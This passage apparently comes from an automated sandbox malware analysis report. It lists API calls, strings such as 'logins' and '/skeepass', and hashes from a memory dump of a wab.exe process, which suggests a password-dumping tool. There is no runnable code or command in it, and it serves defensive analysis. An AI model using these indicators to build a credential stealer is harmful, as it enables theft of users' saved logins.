                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            • API String ID: 1043902810-0
                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                            • memcpy.MSVCRT ref: 0040E3EC
                                                            • memcpy.MSVCRT ref: 0040E407
                                                            • memcpy.MSVCRT ref: 0040E422
                                                            • memcpy.MSVCRT ref: 0040E43D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                            • API String ID: 3073804840-2252543386
                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2899246560-1542517562
                                                            • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                            • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040DBCD
                                                            • memset.MSVCRT ref: 0040DBE9
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                            • API String ID: 3330709923-517860148
                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040806A
                                                            • memset.MSVCRT ref: 0040807F
                                                            • _wtoi.MSVCRT ref: 004081AF
                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                            • memset.MSVCRT ref: 004081E4
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                            • String ID: logins$null
                                                            • API String ID: 3492182834-2163367763
                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • memset.MSVCRT ref: 004085CF
                                                            • memset.MSVCRT ref: 004085F1
                                                            • memset.MSVCRT ref: 00408606
                                                            • strcmp.MSVCRT ref: 00408645
                                                            • _mbscpy.MSVCRT ref: 004086DB
                                                            • _mbscpy.MSVCRT ref: 004086FA
                                                            • memset.MSVCRT ref: 0040870E
                                                            • strcmp.MSVCRT ref: 0040876B
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                            • String ID: ---
                                                            • API String ID: 3437578500-2854292027
                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0041087D
                                                            • memset.MSVCRT ref: 00410892
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            • API String ID: 1010922700-0
                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • malloc.MSVCRT ref: 004186B7
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                            • malloc.MSVCRT ref: 004186FE
                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$FullNamePath$malloc$Version
                                                            • String ID: |A
                                                            • API String ID: 4233704886-1717621600
                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                            • API String ID: 2081463915-1959339147
                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2012295524-70141382
                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                            • API String ID: 667068680-3953557276
                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                            • memcpy.MSVCRT ref: 0041234D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                            • String ID:
                                                            • API String ID: 1700100422-0
                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                            • String ID:
                                                            • API String ID: 552707033-0
                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                            • memcpy.MSVCRT ref: 0040C11B
                                                            • strchr.MSVCRT ref: 0040C140
                                                            • strchr.MSVCRT ref: 0040C151
                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                            • memset.MSVCRT ref: 0040C17A
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                            • String ID: 4$h
                                                            • API String ID: 4066021378-1856150674
                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: %%0.%df
                                                            • API String ID: 3473751417-763548558
                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                            • GetParent.USER32(?), ref: 00406136
                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                            • String ID: A
                                                            • API String ID: 2892645895-3554254475
                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
